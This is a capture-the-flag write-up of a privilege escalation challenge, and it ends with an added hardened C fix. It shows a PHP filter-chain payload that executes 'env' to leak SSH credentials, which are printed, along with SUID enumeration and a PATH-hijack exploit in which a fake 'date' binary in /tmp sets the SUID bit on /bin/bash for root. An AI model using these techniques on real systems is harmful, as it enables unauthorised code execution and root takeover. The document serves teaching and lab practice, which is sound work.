AUCHALL - [Privesc] - Intro Patched Privesc
Challenge Description
Based on the credentials you got from intro-patched, it's time you escalate your privileges.
Solution
Running the following payload against the Intro Patched web challenge gave us credentials:
git clone https://github.com/synacktiv/php_filter_chain_generator.git
python3 php_filter_chain_generator.py --chain '<?php system("env"); ?> '
Using the output of the last command:
Credentials
Username: vancejoy
Password: p0sty_g0a73d
Log in over SSH using those credentials (HOST and PORT are placeholders):
ssh vancejoy@HOST -p PORT
The first thing to do is run sudo -l.
Then we check for SUID binaries:
find / -perm /4000 2>/dev/null
In /opt, along with the helper binary, I got its source code in the src.c file:
#include <stdio.h>
#include <unistd.h>
int main(int argc, char* argv[]) {
    setuid(0);
    setgid(0);
    printf("I have a simple program that can do the following: ");
    printf("1. Show the current time\n");
    printf("2. Show the current date\n");
    printf("What would you like to do? (1 or 2): ");
    int choice;
    scanf("%d", &choice);
    if (choice == 1) {
        system("/usr/bin/date +%T");
    } else if (choice == 2) {
        system("/usr/bin/date +%D");
    } else if(choice == 3) {
        printf("Running date...");
        system("date");
    } else {
        printf("Invalid choice!\n");
    }
}
Strategy
Our input is not used directly in those commands.
Option 3 looks interesting: it does not use an absolute path like /usr/bin/date, only date. So the first thing I would do is abuse the PATH environment variable by adding another directory in front of the existing entries, then craft my own binary with the same name, date, in that directory, which would set the SUID bit on /bin/bash. Then I would run the program again and select option 3 to run that binary, which would set the SUID bit on /bin/bash, and I would get root.
For the directory I would select /tmp.
Set the PATH variable:
$ export PATH=/tmp:$PATH
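Now our PATH is set. Let's craft the binary.
Create the file /tmp/date.c:
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* Keep the root IDs, then set the SUID bit on /bin/bash */
    setuid(0);
    setgid(0);
    system("chmod u+s /bin/bash");
    return 0;
}
Compile the C program using the following command: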
gcc date.c -o date
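The root cause is that option 3 calls system("date") from a setuid-root binary, so the shell resolves date through the caller's PATH. One way to close this, shown as an added example that is not part of the original writeup or the challenge source: call the program by absolute path with execve and a fixed environment. The names run_clean and CLEAN_ENV are hypothetical.

```c
/* Added example: hardened replacement for the helper's option 3.
 * run_clean() and CLEAN_ENV are illustrative names, not from the challenge. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the child; the caller's PATH never reaches it. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

/* Run an absolute-path program without a shell and without PATH lookup.
 * Returns the child's exit status, or -1 on failure. */
int run_clean(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                          /* refuse relative names such as "date" */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, CLEAN_ENV);  /* execve performs no PATH search */
        _exit(127);                         /* only reached if execve failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* What option 3 should do instead of system("date"). */
    char *const date_argv[] = { "date", NULL };
    return run_clean("/usr/bin/date", date_argv) == 0 ? 0 : 1;
}
```

With this in place, prepending /tmp to PATH has no effect on which binary runs, and any child process sees only the fixed PATH.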
Flag
Flag is dynamic
CY243L{env_0ver11de_eA7bFf5E_bcR8_wau2}
Writeups 2023 © RootxRAN.